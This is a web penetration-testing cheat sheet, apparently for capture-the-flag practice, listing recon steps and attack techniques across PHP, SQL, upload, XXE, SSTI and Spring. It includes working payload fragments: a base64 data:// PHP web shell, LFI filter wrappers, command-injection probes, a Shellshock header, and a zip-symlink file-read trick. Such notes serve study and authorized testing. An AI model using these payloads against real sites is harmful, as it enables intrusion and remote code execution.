Web pentest checklist !!!

Server side

  • Reconnaissance

    /robots.txt, /.well-known/security.txt, /sitemap.xml
    Nghịch
    cookies
    Directory indexing.
    Headers
    • Server
    • X-Powered-By: PHP
    • X-AspNet-Version: ASP.Net
    • x-cache, x-status, hit/miss: web cache
    • X-Application-Context: spring boot
    frontend: bottom of HTML, comments, js, css, ...
    old, bak files (backup.zip, ctf_name.zip,...), .git, .bzr, ...

  • Advanced reconnaissance

    dump DNS, certs crt.sh, securitytrails
    Scan dir
    weak password, bruteforce
    nmap

  • PHP

    directory travel, LFI php://filter/read=string.rot13/resource=, pHp://FilTer/convert.base64-encode/resource= , php://filter/zlib.deflate/convert.base64-encode/resource= payload-all-the-thing
    RFI
    Loose compare, type jungle
    PHP-type-comparison-tables
    $_SESSION["uninitialized"] === NULL
    Redirecting without die()
    upload lib, use LD_PRELOAD to bypass disable_function
    advanced inclusion
    RCE data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
    RCE php://input
    RCE /proc/self/fd/...(brute to get access.log or error.log)
    via-php-sessions
    upload zipped payload then use zip stream zip://shell.jpg%23payload.php
    deserialize
    We can declare and assign new properties in serialize data.
    PHP method/function names are case insensitive
    There are additional magic methods in PHP default interfaces like ArrayAccess, ArrayIterator,Serializable: offsetGet(), offsetSet(), current()
    use S and \00 to bypass null byte filter mates2019r4-web2 , not necessary with php>=7.2
    use R to refer another property O:8:"stdClass":2:{s:3:"xyz";s:1:"u";s:4:"flag";R:2;}
    phpggc
    using file function with phar wrapper ripstech-New-PHP-Exploitation-Technique-Added , It’s-a-PHP-unserialization-vulnerability-Jim, ...
    Possible SSRF with __call() [1]

  • command inject

    sleep 3
    %0asleep 3
    ;%0asleep 3
    dns-based ref0

  • SQL

    escape
    use \
    use \" with json
    others
    MySQL truncation
    MySQL doesn't distinguish "lol" and "lol " -> Can insert duplicate entry

  • Upload files

    PHP upload files
    .php .php3 .php4 .php5 .php7 .htaccess .pht .phtm .phtml .phar .phps
    upload zip file with symlink ln -s ../index.php abc.txt; zip -y abc.zip abc.txt
    PHP exif_imagetype only check first bytes (magic bytes)
    ASP upload files
    .aspx .shtml .stm .config .ashx .asmx .aspq .axd .cshtm .cshtml .rem .soap .vbhtm .vbhtml .asa .asp .cer
    Upload .htaccess file https://github.com/wireghoul/htshells
    Upload web.config file [1]
    bypass
    extensions
    MIME types
    NULL byte (%00, hexedit burp)

  • XXE

    out of band ref0
    redefine local dtd //mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

  • NoSQL

    Check with {"ne":1} and check error with {"$where":1}

  • SSTI

    portswigger, payload-all-the-thing
    Flask-RCE (refer to tplmap ): payload, search.py

  • More

    HTTP Verb Tampering
    xslt
    LDAP inject
    XPATH inject

  • Misc, logic bugs, bypass

    \u0061 (unicode)in json
    Host header attack reset password function https://tradahacking.vn/ho%C3%A0i-ni%E1%BB%87m-d8133ecf0dea

  • Applications/Frameworks(misused, CVEs..)

    spring framework
    AutoBinding / Mass Assignment Web-CTF-Cheatsheet, volgactf-shop, volgactf-shopv2
    spring boot
    Actuator endpoints swisskyrepo [1]
    jolokia
    install new jar 0ctf2019-ghostpepper
    apache mod-cgi
    Shellshock User-Agent: () { :;}; /bin/bash -c '...' ritsecctf-web4 , cve-detail

  • Privilege Escalation

    use wildcard with chown or tar [1]
crlf

Client side